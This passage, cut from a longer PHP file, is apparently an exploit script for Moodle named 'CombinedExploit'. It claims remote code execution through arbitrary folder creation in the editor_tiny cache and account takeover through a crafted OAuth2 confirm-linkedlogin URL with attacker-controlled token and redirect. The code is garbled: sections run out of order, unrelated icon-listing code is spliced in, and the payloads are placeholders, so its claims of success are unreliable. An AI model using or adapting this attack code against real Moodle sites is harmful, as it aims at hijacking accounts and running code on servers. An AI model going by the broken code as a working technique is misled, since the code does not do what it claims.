localcachedir}/editor_tiny/{$rev}/{$filepathhash}"; @mkdir(dirname($candidatefile), $CFG->directorypermissions, true); // Exploit 2: Self-XSS leading to Account Takeover $token = "malicious_token"; $username = "attacker@gmail.com"; $userid = "attacker_userid"; $issuerid = "oauth_issuerid"; $redirect = "http://moodle-domain/user/edit.php?id=11%231"; $confirm_url = "http://moodle-domain/auth/oauth2/confirm-linkedlogin.php?" . "token={$token}&userid={$userid}&username={$username}&issuerid={$issuerid}&redirect={$redirect}"; echo ""; // Exploit 1: Continued $path = "/var/www/html/pix/f/.png"; $icons = array(); if ($handle = @opendir($path)) { while (($file = readdir($handle)) !== false) { $matches = array(); if (preg_match('~(.+?)(?:-24|-32|-48|-64|-72|-80|-96|-128|-256)?\.(?:svg|gif|png)$~', $file, $matches)) { $key = $matches[1]; $icons[$key] = $key; } } closedir($handle); } ksort($icons); // Exploit 2: Continued // Exploit successful, execute XSS payload // JavaScript payload goes here // ... // Exploit 1: Remote Code Execution // Exploit code goes here $rev = "1"; // Arbitrary value, can be controlled by attacker $filepathhash = "somehash"; // Arbitrary value, can be controlled by attacker // Construct paths for arbitrary folder creation $candidatefileTiny = "/var/www/html/localcachedir/editor_tiny/{$rev}/lang/{$filepathhash}/lang.json"; $candidatefileLoader = "/var/www/html/localcachedir/editor_tiny/{$rev}/{$filepathhash}"; // Create arbitrary folders @mkdir(dirname($candidatefileTiny), $CFG->directorypermissions, true); @mkdir(dirname($candidatefileLoader), $CFG->directorypermissions, true); // Exploit successful, execute remote code // Code execution payload goes here // Exploit 2: Continued } } $combinedExploitInstance = new CombinedExploit(); $combinedExploitInstance->executeExploit(); ?>